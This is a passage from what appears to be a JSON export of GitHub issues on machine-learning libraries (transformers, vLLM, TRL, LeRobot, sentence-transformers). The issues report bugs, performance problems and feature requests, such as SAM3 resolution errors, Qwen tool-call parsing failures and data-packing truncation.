torch\nfrom PIL import Image\nimport requests\nfrom transformers import Sam3Processor, Sam3Model\nimport os\n\n\nINFERENCE_RESOLUTION = (1008, 1008) # If run with anything else other than 1008 it fails\n# INFERENCE_RESOLUTION = (1400, 1400)\n\n\ndef test_sam3_text_prompting():\n \"\"\"Test SAM3 with text prompting on a sample image.\"\"\"\n\n # Set device\n device = \"cpu\"\n print(f\"Using device: {device}\")\n\n # Load model and processor\n print(\"Loading SAM3 model and processor...\")\n model = Sam3Model.from_pretrained(\"facebook/sam3\").to(device)\n processor = Sam3Processor.from_pretrained(\"facebook/sam3\")\n\n # Load a sample image\n print(\"Loading sample image...\")\n image_url = \"http://images.cocodataset.org/val2017/000000077595.jpg\"\n image = Image.open(requests.get(image_url, stream=True).raw).convert(\"RGB\")\n\n # Define text prompts to test\n text_prompts = [\"cat\", \"ear\", \"eye\"]\n\n for text_prompt in text_prompts:\n print(f\"\\nTesting text prompt: '{text_prompt}'\")\n\n # Prepare inputs\n inputs = processor(images=image, text=text_prompt, size=INFERENCE_RESOLUTION, return_tensors=\"pt\").to(device)\n\n # Run inference\n with torch.no_grad():\n outputs = model(**inputs)\n\n # Post-process results\n results = processor.post_process_instance_segmentation(\n outputs,\n threshold=0.5,\n mask_threshold=0.5,\n target_sizes=inputs.get(\"original_sizes\").tolist()\n )[0]\n\n # Display results\n num_objects = len(results['masks'])\n print(f\"Found {num_objects} objects matching '{text_prompt}'\")\n\n if num_objects > 0:\n # Show scores for first few objects\n scores = results['scores']\n print(f\"Confidence scores: {scores[:min(3, len(scores))].tolist()}\")\n\n # Show bounding boxes for first 
object\n if 'boxes' in results and len(results['boxes']) > 0:\n box = results['boxes'][0]\n print(f\"First object bounding box (xyxy): {box.tolist()}\")\n\n\nif __name__ == \"__main__\":\n print(\"SAM3 Text Prompting Test Script\")\n print(\"=\" * 40)\n\n try:\n test_sam3_text_prompting()\n print(\"\\n\u2713 All tests completed successfully!\")\n\n except Exception as e:\n print(f\"\\n\u2717 Test failed with error: {e}\")\n raise\n\n```\n\nOutput when INFERENCE_RESOLUTION=[1400, 1400]:\n```sh\n$ py test_sam3_text.py\nSAM3 Text Prompting Test Script\n========================================\nUsing device: cpu\nLoading SAM3 model and processor...\nLoading weights: 100%|\u2588| 1468/1468 [00:00<00:00, 2709.52it/s, Materializing param=vision_encoder.neck.fpn\nLoading sample image...\n\nTesting text prompt: 'cat'\n\n\u2717 Test failed with error: The size of tensor a (10000) must match the size of tensor b (5184) at non-singleton dimension 2\nTraceback (most recent call last):\n File \"/home/master-andreas/panopticon/test_sam3_text.py\", line 124, in \n test_sam3_text_prompting()\n File \"/home/master-andreas/panopticon/test_sam3_text.py\", line 48, in test_sam3_text_prompting\n outputs = model(**inputs)\n ^^^^^^^^^^^^^^^\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1775, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1786, in _call_impl\n return forward_call(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/transformers/utils/generic.py\", line 938, in wrapper\n ", "url": "https://github.com/huggingface/transformers/issues/42331", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-21T22:17:08Z", "updated_at": "2025-12-10T22:46:39Z", "comments": 3, "user": "Kallinteris-Andreas" }, { "repo": "huggingface/lerobot", "number": 2500, "title": "question about the gr00t policy", "body": "hi,\n\nI see here https://huggingface.co/docs/lerobot/en/groot that gr00t is intergrated into lerobot.\n\nis it in sync with the original repo: https://github.com/NVIDIA/Isaac-GR00T ?\n\nI see in original repo that the dataset used to fine-tune, is a bit different from the original lerobot format, like libero dataset (https://huggingface.co/datasets/physical-intelligence/libero) used in pi model ,\ntherefore i wonder what dataset format should be used here in lerbot policy training ?\n\nany example dataset that is passed to `--dataset.repo_id=$DATASET_ID` ?\n\nis it a post-processed dataset ?", "url": "https://github.com/huggingface/lerobot/issues/2500", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-11-21T21:45:19Z", "updated_at": "2025-12-03T14:03:34Z", "user": "yanan1116" }, { "repo": "vllm-project/vllm", "number": 29192, "title": "Tool Calling Parsers Fail to Populate tool_calls Array for Qwen2.5-Coder Models", "body": "# Tool Calling Parsers Fail to Populate `tool_calls` Array for Qwen2.5-Coder Models\n\n## Environment\n- **vLLM Version**: v0.11.2.dev115+g56669c1f2 (Blackwell build)\n- **Model**: Qwen/Qwen2.5-Coder-14B-Instruct-AWQ\n- **Quantization**: AWQ\n- **Python Version**: 3.x (Docker container)\n- **GPU**: NVIDIA GeForce RTX 5080 (16GB, Blackwell/sm_120)\n- **Platform**: WSL2, Linux 6.6.87.2-microsoft-standard-WSL2\n\n## Description\nWhen using tool calling 
with Qwen2.5-Coder models, the model correctly generates tool calls in `` XML format, but both `qwen3_xml` and `qwen3_coder` parsers fail to extract these tool calls into the `tool_calls` array in the API response. The tool call information remains in the `content` field but the `tool_calls` array stays empty.\n\n## Steps to Reproduce\n\n1. Start vLLM with Qwen2.5-Coder and tool calling parser:\n```bash\npython -m vllm.entrypoints.openai.api_server \\\n --model Qwen/Qwen2.5-Coder-14B-Instruct-AWQ \\\n --quantization awq \\\n --enable-auto-tool-choice \\\n --tool-call-parser qwen3_xml # or qwen3_coder\n```\n\n2. Send a tool calling request:\n```bash\ncurl -s http://localhost:8002/v1/chat/completions \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"model\": \"qwen2.5-coder-14b-awq\",\n \"messages\": [{\"role\": \"user\", \"content\": \"What is the weather in San Francisco?\"}],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_weather\",\n \"description\": \"Get the current weather for a location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state, e.g. San Francisco, CA\"\n }\n },\n \"required\": [\"location\"]\n }\n }\n }\n ],\n \"tool_choice\": \"auto\"\n }'\n```\n\n## Actual Output\n```json\n{\n \"id\": \"chatcmpl-xxx\",\n \"object\": \"chat.completion\",\n \"model\": \"qwen2.5-coder-14b-awq\",\n \"choices\": [\n {\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"\\n{\\n \\\"name\\\": \\\"get_weather\\\",\\n \\\"arguments\\\": {\\n \\\"location\\\": \\\"San Francisco, CA\\\"\\n }\\n}\\n\",\n \"tool_calls\": []\n }\n }\n ]\n}\n```\n\n## Expected Output\n```json\n{\n \"id\": \"chatcmpl-xxx\",\n \"object\": \"chat.completion\",\n \"model\": \"qwen2.5-coder-14b-awq\",\n \"choices\": [\n {\n \"message\": {\n \"role\": \"assistant\",\n \"content\": \"\",\n \"tool_calls\": [\n {\n \"type\": \"function\",\n \"id\": \"call_0\",\n \"function\": {\n \"name\": \"get_weather\",\n \"arguments\": \"{\\\"location\\\": \\\"San Francisco, CA\\\"}\"\n }\n }\n ]\n }\n }\n ]\n}\n```\n\n## Analysis\n\n### Model Output (Correct)\nThe model correctly generates tool calls in the expected `` XML format:\n```xml\n\n{\n \"name\": \"get_weather\",\n \"arguments\": {\n \"location\": \"San Francisco, CA\"\n }\n}\n\n```\n\n### Parser Behavior (Incorrect)\nBoth recommended parsers fail to extract tool calls:\n- **hermes parser**: Expects `` tags, doesn't match `` tags\n- **qwen3_xml parser**: Designed for `` tags but doesn't populate `tool_calls` array\n- **qwen3_coder parser**: Also designed for Qwen but fails to populate array\n\n### Root Cause\nThe parsers appear to load correctly (visible in logs as `'tool_call_parser': 'qwen3_xml'`) but the extraction logic fails to populate the OpenAI-compatible `tool_calls` array structure.\n\n## Workaround\nManual extraction from the `content` field:\n\n```python\nimport re\nimport json\n\ndef extract_tool_calls(response):\n \"\"\"Extract tool calls from Qwen2.5-Coder tags\"\"\"\n content = response['choices'][0]['message']['content']\n pattern = r'\\s*({.*?})\\s*'\n match = re.search(pattern, content, re.DOTALL)\n\n if match:\n tool_data = json.loads(match.group(1))\n return [{\n \"type\": \"function\",\n \"function\": {\n \"name\": tool_data[\"name\"],\n \"arguments\": json.dumps(tool_data[\"arguments\"])\n }\n }]\n return []\n```\n\n## Additional Context\n\n### Multi-AI Consultation Results\nConsulted with multiple AI models for 
parser recommendation:\n- **Qwen3 Coder (480B)**: Recommended `qwen3_xml` parser\n- **DeepSeek V3.1**: Ranked `qwen3_xml` (90% confidence), `qwen3_coder` (80% confidence)\n- **Claude Sonnet 4.5**: Confirmed tag mismatch between Hermes and Qwen formats\n\nAll models agreed that the parser selection is correct, suggesting the issue is in the parser implementation rather than configuration.\n\n### vLLM Configuration\n```python\n{\n 'tool_call_parser': 'qwen3_xml', # Confirmed in logs\n 'enable_auto_tool_choice': True,\n 'model': 'Qwen/Qwen2.5-Coder-14B-Instruct-AWQ',\n 'quantization': 'awq',\n 'max_model_len': 8192\n}\n```\n\n## Impact\n- **Severity**: High - Breaks OpenAI API compatibility for tool calling\n- **Affected Models**: Likely all Qwen2.5-Coder variants\n-", "url": "https://github.com/vllm-project/vllm/issues/29192", "state": "open", "labels": [], "created_at": "2025-11-21T18:31:19Z", "updated_at": "2025-11-21T18:31:19Z", "comments": 0, "user": "Platano78" }, { "repo": "vllm-project/vllm", "number": 29180, "title": "[Bug]: Recorded `EngineCoreEventType.QUEUED` time is off", "body": "### Your current environment\n\n
\n\n### \ud83d\udc1b Describe the bug\n\nWhen running benchmarking with the CLI:\n\n- on one side the serving point `vllm serve ...`\n- on the other side the benchmarking client : `vllm bench serve...`\n(note that the two are running on the same machine, there is no networking delay)\n\nI noticed that the `EngineCoreEventType.QUEUED` event recorder on the server side didn't match the time of posting the request. In my understanding these two should events should be approximately equivalent. These values aren't off by a few milliseconds, but here the mismatch can be pretty big, up to a few seconds. \n\nI think the reason might be because adding [request to the scheduler](https://github.com/vllm-project/vllm/blob/fcb1d570bb8f95f5b7ded716a52fec902c535f0e/vllm/v1/core/sched/scheduler.py#L1166) cannot be done when the engine is running a decoding or a prefill, see the [`_process_input_queue` function](https://github.com/vllm-project/vllm/blob/fcb1d570bb8f95f5b7ded716a52fec902c535f0e/vllm/v1/engine/core.py#L801), where `add_request()` ultimately gets called. This can introduce delays before the queued event gets recorded, having \"floating\" requests that are not tracked in the logs.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29180", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-21T12:58:36Z", "updated_at": "2025-11-30T20:56:44Z", "comments": 4, "user": "sducouedic" }, { "repo": "vllm-project/vllm", "number": 29177, "title": "[Usage]: Vllm + Intervl model local infra Image preprocessing / request adding becomes bottleneck even with more CPU cores \u2014 how to accelerate?", "body": "### Your current environment\n\nvllm 0.11.0\n\n\n### How would you like to use vllm\n\n### current phenomenon\nWhen doing **batched image classification** (64 images per batch) with InternVL3_5-1B, the bottleneck is clearly in the **\"Adding requests\"** phase (image preprocessing). \nEven after increasing CPU cores and setting `OMP_NUM_THREADS=16`, the preprocessing speed stays around **50 it/s**, while the actual generation phase is extremely fast (>1500 prompts/s).\n\n```text\nAdding requests: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 64/64 [00:01<00:00, 52.67it/s] \u2190 bottleneck\nProcessed prompts: 100%|\u2588| 64/64 [00:00<00:00, 1515.23it/s, est. speed input: 812805.23 tok/s]\n```\nThis means ~95% of the total latency is spent on CPU-side image preprocessing, \uff08I have disabled dynamic resolution\uff09\n\n\n### Minimal Reproducible Example\n```python\nimport os\nfrom PIL import Image\nfrom vllm import LLM, SamplingParams\nfrom transformers import AutoTokenizer\n\nmodel_path = \"/data/code/haobang.geng/models/InternVL3_5-1B\"\ntokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)\n\nllm = LLM(\n model=model_path,\n dtype=\"bfloat16\",\n max_model_len=4096,\n gpu_memory_utilization=0.95,\n limit_mm_per_prompt={\"image\": 1},\n trust_remote_code=True,\n enforce_eager=False,\n)\n\nprompt = \"\\nYou are an image classifier. 
Output only one word: safe or nsfw.\"\nsampling_params = SamplingParams(temperature=0.0, max_tokens=8)\n\nbatch_inputs = []\nfor i in range(64):\n img = Image.open(f\"/path/to/images/{i}.jpg\").convert(\"RGB\")\n batch_inputs.append({\n \"prompt\": prompt,\n \"multi_modal_data\": {\"image\": img},\n })\n\noutputs = llm.generate(batch_inputs, sampling_params=sampling_params, use_tqdm=True)\n```\n\n### Expected behavior\nFor pure-text batches, Adding requests runs at >2000 it/s (e.g., with qwen3vl).\n\n### Attempted solutions to speed up (all ineffective)\nIncrease CPU cores / set OMP_NUM_THREADS=16 \u2192 no speedup\nmm_processor_kwargs={\"max_dynamic_patch\": 1, ...} \u2192 seems to give no speedup\nPre-resize images to 384\u00d7384 \u2192 helps a little (~55 it/s) but still far from ideal\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.\n\n\n\nThank you for the great work on vLLM! Looking forward to a simple way to solve it", "url": "https://github.com/vllm-project/vllm/issues/29177", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-21T10:56:29Z", "updated_at": "2025-12-01T14:08:22Z", "comments": 3, "user": "Passenger12138" }, { "repo": "huggingface/trl", "number": 4554, "title": "Better packing of data with best-fit decrease strategy", "body": "Hello,\n\nWhen using packing with the bfd strategy, it looks like too much truncation is done when the seq_length is smaller than the average length of the sequences we want to pack.\n\nFor example:\n```python\nfrom datasets import Dataset\nfrom trl import pack_dataset\n\nexamples = {\n \"input_ids\": [[1, 2, 3, 4], [5, 6], [7, 8, 9], [10]],\n \"attention_mask\": [[1, 1, 1, 1], [1, 0], [1, 0, 0], [1]],\n}\ndataset = Dataset.from_dict(examples)\n\npacked_dataset = pack_dataset(dataset, seq_length=3, strategy=\"bfd\")\nprint(packed_dataset)\n```\n\nresults in:\n```python\n{'input_ids': [[1, 2, 3], [7, 8, 9], [5, 6, 10]],\n 'attention_mask': [[1, 1, 1], [1, 0, 0], [1, 0, 1]],\n 'seq_lengths': [[3], [3], [2, 1]]}\n```\nSo the token '4' is missing from the training tokens.\n\nIn an extreme case:\n```python\nexamples_2 = {\n \"input_ids\": [[0, 0], [1, 2, 3, 4], [5, 6, 7, 8, 9], [10]],\n \"attention_mask\": [[1, 1], [1, 1, 1, 1], [1, 1, 1, 1, 1], [1]],\n}\ndataset_2 = Dataset.from_dict(examples_2)\nprint(pack_dataset(dataset_2, seq_length=1, strategy=\"bfd\")[:])\n```\nresults in:\n```python\n{'input_ids': [[0], [1], [5], [10]],\n 'attention_mask': [[1], [1], [1], [1]],\n 'seq_lengths': [[1], [1], [1], [1]]}\n```\n\nSo here we are basically applying truncation to every sequence instead of having twelve sequences of one token.\n\nTo put ourselves in a more useful setting: when I was fine-tuning on some very long sequences with a seq_length of 4096, the majority of the tokens were discarded by the bfd packing. On my dataset, the bfd method kept only 0.2% of the total training tokens.\n\nIs this behavior normal?\nI would find it useful to add an option that keeps the tokens that would otherwise be deleted by placing them in additional sequences, even if this is less than ideal. 
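As a rough illustration of what such an option could do, here is a minimal sketch written against the public `datasets`/`trl` APIs (`split_long_examples` is a hypothetical helper, not part of TRL): pre-chunking overlong sequences into `seq_length`-sized pieces before packing means BFD never has to truncate.

```python
from datasets import Dataset
from trl import pack_dataset

def split_long_examples(examples: dict, seq_length: int) -> dict:
    # Illustrative helper (not a TRL API): chunk every sequence into
    # pieces of at most seq_length tokens, so that pack_dataset's
    # truncation can never drop a token.
    out = {"input_ids": [], "attention_mask": []}
    for ids, mask in zip(examples["input_ids"], examples["attention_mask"]):
        for i in range(0, len(ids), seq_length):
            out["input_ids"].append(ids[i : i + seq_length])
            out["attention_mask"].append(mask[i : i + seq_length])
    return out

examples_2 = {
    "input_ids": [[0, 0], [1, 2, 3, 4], [5, 6, 7, 8, 9], [10]],
    "attention_mask": [[1, 1], [1, 1, 1, 1], [1, 1, 1, 1, 1], [1]],
}
dataset_2 = Dataset.from_dict(split_long_examples(examples_2, seq_length=1))
# All twelve tokens now survive as twelve one-token sequences:
print(pack_dataset(dataset_2, seq_length=1, strategy="bfd")[:])
```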
It would be a good compromise between the current versions of bfd and wrapped.", "url": "https://github.com/huggingface/trl/issues/4554", "state": "closed", "labels": [ "\u2728 enhancement", "\u2753 question" ], "created_at": "2025-11-21T07:53:55Z", "updated_at": "2025-12-16T20:37:02Z", "comments": 3, "user": "ntnq4" }, { "repo": "vllm-project/vllm", "number": 29148, "title": "[Usage]: Deployment of the embedding models", "body": "### Your current environment\n\n```text\n============================== \n System Info \n============================== \nOS : Ubuntu 22.04.5 LTS (x86_64) \nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0 \nClang version : Could not collect \nCMake version : version 3.22.1\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.16 (main, Dec 11 2024, 16:24:50) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-161-generic-x86_64-with-glibc2.35\n\n============================== \n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.61\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA GeForce RTX 5090\nGPU 1: NVIDIA GeForce RTX 5090\nGPU 2: NVIDIA GeForce RTX 5090\nGPU 3: NVIDIA GeForce RTX 5090\nGPU 4: NVIDIA GeForce RTX 5090\nGPU 5: NVIDIA GeForce RTX 5090\nGPU 6: NVIDIA GeForce RTX 5090\nGPU 7: NVIDIA GeForce RTX 5090\n\nNvidia driver version : 570.172.08\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.7.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.7.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n```\n\n\n### How would you like to use vllm\n\nWhen deploying the embedding model, I found that the actual GPU memory usage included not only the model itself but also kv_cache. Is this a reasonable phenomenon? In version v0.9.0, the GPU memory usage was only for the model itself.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29148", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-21T03:57:59Z", "updated_at": "2025-11-21T06:17:18Z", "comments": 3, "user": "Root970103" }, { "repo": "vllm-project/vllm", "number": 29139, "title": "[Feature]: Optimize collectives in TP MoE case using torch.compile pass", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nTo avoid redundant work in MoE models in the TP case, sequence parallelism was added to the Deepseek model definition in #24134 and expanded to other models in #24982. However, to avoid performing surgery on the linear layer, the current approach performs more communication than necessary. 
With a torch.compile custom pass, we can rewrite the graph to remove the redundant computation.\n\n### More details\n\nBefore the SP optimization, the ops in the model were:\n```\n- o_proj:[num_tokens, ...] -> [num_tokens, ...] (incomplete results)\n- all_reduce:[num_tokens, ...] -> [num_tokens, ...]\n- router:[num_tokens, ...] -> [num_tokens, ...]\n- experts:[num_tokens, ...] -> [num_tokens, ...]\n- ...\n```\n\nWith sequence parallel enabled, this becomes:\n```\n- o_proj: [num_tokens, ...] -> [num_tokens, ...] (incomplete results)\n- all_reduce: [num_tokens, ...] -> [num_tokens, ...]\n- chunk: [num_tokens, ...] -> [num_tokens/tp, ...]\n- router: [num_tokens/tp, ...] -> [num_tokens/tp, ...]\n- experts: [num_tokens/tp, ...] -> [num_tokens/tp, ...]\n- all_gather: [num_tokens/tp, ...] -> [num_tokens, ...]\n```\n\nAdditionally, experts now properly do the dp+tp<->ep dispatch instead of just the original replicated dp<->ep dispatch.\n\nNotice that the `all_reduce` does redundant communication as each TP rank only requires partial results. With a compile pass, we can convert the `all_reduce` -> `chunk` sequence into a `reduce_scatter`:\n\n```\n- o_proj: [num_tokens, ...] -> [num_tokens, ...] (incomplete results)\n- reduce_scatter: [num_tokens, ...] -> [num_tokens/tp, ...]\n- router: [num_tokens/tp, ...] -> [num_tokens/tp, ...]\n- experts: [num_tokens/tp, ...] -> [num_tokens/tp, ...]\n- all_gather: [num_tokens/tp, ...] -> [num_tokens, ...]\n```\n\nWe should create a new `SequenceParallelismMoEPass`, controlled by a new `PassConfig.enable_sp_moe` flag (following the new naming convention in #27995) so that it can be turned on independently of regular SP. We will likely need to pad the number of tokens to a multiple of TP size, although like described in #29136, there are alternatives.\n\n### Alternatives\n\nAlternatively, the original optimization could be done as a compile pass as well, which would significantly clean up the MoE model definitions. However, that would mean that `VLLM_COMPILE` compilation mode would be required for this optimization and if compilation is disabled, the optimization would be disabled as well. 
Generally we accept lower performance in eager mode as compilation is on by default, but I know there was a reason this was done this way (don't remember why).\n\n### Additional context\n\nOriginal proposal comment: https://github.com/vllm-project/vllm/pull/24982#pullrequestreview-3259494618\n\ncc @tlrmchlsmth @bnellnm @robertgshaw2-redhat @alexm-redhat @zou3519 @nvpohanh @youkaichao \n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29139", "state": "open", "labels": [ "help wanted", "good first issue", "performance", "feature request", "torch.compile" ], "created_at": "2025-11-21T01:36:06Z", "updated_at": "2025-12-07T15:39:48Z", "comments": 19, "user": "ProExpertProg" }, { "repo": "vllm-project/vllm", "number": 29097, "title": "[Docs] Feedback for `/en/latest/`", "body": "### \ud83d\udcda The doc issue\n\nno\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29097", "state": "closed", "labels": [ "documentation" ], "created_at": "2025-11-20T14:53:44Z", "updated_at": "2025-11-21T07:51:57Z", "comments": 2, "user": "ch950684-svg" }, { "repo": "vllm-project/vllm", "number": 29089, "title": "[Performance]: Can we use CUDA graph to accelerate the Qwen2_5omniAudioEncoder in Qwen2.5-Omni-3B?", "body": "### Proposal to improve performance\n\n\"Image\"\nThe trace graph shows that Qwen2_5omniAudioEncoder has a large number of small kernel startups, indicating significant room for optimization.\nCan we use CUDA graph to accelerate the Qwen2_5omniAudioEncoder in Qwen2.5-Omni-3B?\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29089", "state": "open", "labels": [ "performance" ], "created_at": "2025-11-20T12:13:58Z", "updated_at": "2025-11-20T12:13:58Z", "comments": 0, "user": "xq25478" }, { "repo": "vllm-project/vllm", "number": 29078, "title": "[Performance]: Excessive CPU usage caused by multiple instances", "body": "### Your current environment\nGPU: RTX4090\ncuda version: cuda12.8\nvllm version: 0.11.0\n\nI launched 4 instances of the minerU2.5 model using the vllm backend of Triton Server. My server is equipped with 2 GPUs, with 1 instance running on each GPU. However, I noticed that the CPU load sometimes spikes to extremely high levels, nearly maxing out the server\u2014which has 192 CPU cores. The vllm backend uses AsyncLLMEngine.\n\nWhen running a single instance on one GPU and sending 200 small-sized text images for OCR, I achieved the highest FPS\u2014processing up to 200 images per second\u2014with the CPU load hovering around 40-50%. To further improve performance, I launched one instance on each of the two GPUs. But in this scenario, the CPU load reached nearly 99% (extremely high usage), and each instance only achieved around 120 FPS, with almost no performance gain.\n\nI conducted numerous tests. Initially, I suspected the issue was with Triton Server, but after troubleshooting, I believe the problem lies in the high CPU usage during vllm inference. Even when not using Triton Server\u2014simulating the same scenario with `vllm serve`\u2014each vllm instance consumes 20-30% of the CPU. If this persists, adding more GPUs to the server will not improve model performance. 
How should I debug this?\n\n\n### How would you like to use vllm\n\nI want to run inference of a [[MinerU2.5-2509-1.2B]().](https://huggingface.co/opendatalab/MinerU2.5-2509-1.2B) I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29078", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-20T08:26:35Z", "updated_at": "2025-11-21T02:17:51Z", "comments": 4, "user": "zjq1996518" }, { "repo": "huggingface/transformers", "number": 42291, "title": "Can we disable IPython progress bar and use normal tqdm bar?", "body": "I like the normal tqdm bar much better, it is lighter, cleaner, simpler, and less stress on my eyes (no green color). I would love to have an option to use tqdm bar and not IPython bar. ", "url": "https://github.com/huggingface/transformers/issues/42291", "state": "closed", "labels": [], "created_at": "2025-11-20T01:26:11Z", "updated_at": "2025-12-28T08:02:45Z", "comments": 1, "user": "weathon" }, { "repo": "vllm-project/vllm", "number": 29023, "title": "[Feature]: Disable logging `/metrics`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n- IGW hits `/metrics` continuously to understand the current load on the system\n- This leads to an overload of logs\n- We can disable this with `--disable-uvicorn-access-log`, but lose access to all access logs\n\nWe should have `--disable-uvicorn-metrics-access-log` to avoid logging * just * metrics. Per Gemini, we can do this with something like:\n\n```python\n# Define the routes for which access logs should be disabled\nEXCLUDE_PATHS = [\"/health\", \"/metrics\"]\n\nclass EndpointFilter(logging.Filter):\n def filter(self, record: logging.LogRecord) -> bool:\n # Check if the log record contains arguments and if the path matches an excluded path\n if record.args and len(record.args) >= 3:\n path = record.args[2] # The path is typically the third argument in uvicorn access logs\n if path in EXCLUDE_PATHS:\n return False # Exclude this log record\n return True # Include all other log records\n```\n\nCreate a command line arg like `--disable-uvicorn-metrics-access-log`which selectively disables logging hits to `/metrics`\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29023", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-11-19T18:25:48Z", "updated_at": "2025-11-19T21:57:34Z", "comments": 5, "user": "robertgshaw2-redhat" }, { "repo": "huggingface/sentence-transformers", "number": 3575, "title": "How to override model's `max_seq_length`?", "body": "It seems that impossible to override model's max length from `sentence_bert_config.json`. 
\n\n```python\nfrom sentence_transformers import SentenceTransformer\n\nm = SentenceTransformer(\"intfloat/e5-small\", tokenizer_kwargs={\"model_max_length\":3})\nprint(m.tokenize([\"hi hi hi hi hi hi hi hi hi hi hi hi hi\"]))\n# {'input_ids': tensor([[ 101, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632,\n# 7632, 7632, 102]]), 'token_type_ids': tensor([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]), 'attention_mask': tensor([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]])}\nprint(m.tokenize([\"hi hi hi hi hi hi hi hi hi hi hi hi hi\"], truncation=True))\n# {'input_ids': tensor([[ 101, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632, 7632,\n# 7632, 7632, 102]]), 'token_type_ids': tensor([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]), 'attention_mask': tensor([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]])}\nprint(m[0].tokenizer([\"hi hi hi hi hi hi hi hi hi hi hi hi hi\"], truncation=True))\n# {'input_ids': [[101, 7632, 102]], 'token_type_ids': [[0, 0, 0]], 'attention_mask': [[1, 1, 1]]}\n\nm.max_seq_length = 3\nprint(m.tokenize([\"hi hi hi hi hi hi hi hi hi hi hi hi hi\"]))\n# {'input_ids': tensor([[ 101, 7632, 102]]), 'token_type_ids': tensor([[0, 0, 0]]), 'attention_mask': tensor([[1, 1, 1]])}\n```\n\nThis is happening because during load it load `max_seq_length` from `sentence_bert_config` and then in `Transformers` it will override `max_seq_length` only it wasn't set in `sentence_bert_config` https://github.com/huggingface/sentence-transformers/blob/ad28c0a982acc39c73abdf0019faca10f227ef28/sentence_transformers/models/Transformer.py#L101-L118 even if 